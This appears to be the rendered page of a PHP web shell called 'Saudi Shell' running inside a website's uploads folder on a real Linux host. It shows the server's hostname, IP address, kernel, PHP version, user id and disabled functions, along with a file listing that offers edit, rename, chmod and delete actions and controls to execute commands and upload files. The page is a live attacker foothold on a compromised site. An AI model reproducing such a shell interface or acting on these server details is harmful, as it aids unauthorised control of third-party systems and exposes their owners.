Saudi Shell
OS : Linux cld21.cloud-servers.net 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64   [ Google ]   [ exploit-db ]
safe_mode: OFF
disable_functions : exec,passthru,shell_exec,system
Server : Apache
PHP version : 8.1.34
Id : user = w0323med | uid= 1087 | gid= 1089
Pwd : /home/w0323med/public_html/uploads/meetnvisit  drwxr-xr-x  [ Home ]


Your ip : 216.73.216.1    | ip server : 37.27.141.47 |  list site |  phpinfo |


NameSizeModifyOwner/GroupPermissionsOption
[ . ]dir2023-05-24 03:46:42w0323med/w0323meddrwxr-xr-x   0755R - C - rm
[ .. ]dir2023-05-24 03:46:42w0323med/w0323meddrwxr-xr-x   0755R - C - rm
AdminLTELogo.png2.582022-02-07 20:33:10w0323med/w0323med-rw-r--r--   0644E - R - C - D - rm
logo-xl.png1.272022-02-07 20:33:10w0323med/w0323med-rw-r--r--   0644E - R - C - D - rm
logo-xs.png0.302022-02-07 20:33:10w0323med/w0323med-rw-r--r--   0644E - R - C - D - rm
user1-128x128.jpg2.692022-02-07 20:33:10w0323med/w0323med-rw-r--r--   0644E - R - C - D - rm
user3-128x128.jpg3.322022-02-07 20:33:10w0323med/w0323med-rw-r--r--   0644E - R - C - D - rm
user4-128x128.jpg3.372022-02-07 20:33:10w0323med/w0323med-rw-r--r--   0644E - R - C - D - rm
user5-128x128.jpg6.262022-02-07 20:33:10w0323med/w0323med-rw-r--r--   0644E - R - C - D - rm
user6-128x128.jpg4.152022-02-07 20:33:10w0323med/w0323med-rw-r--r--   0644E - R - C - D - rm
user7-128x128.jpg6.212022-02-07 20:33:10w0323med/w0323med-rw-r--r--   0644E - R - C - D - rm
user8-128x128.jpg4.872022-02-07 20:33:10w0323med/w0323med-rw-r--r--   0644E - R - C - D - rm




Change dir :
Make dir :
read file :
Make file :
Execute :
Upload file :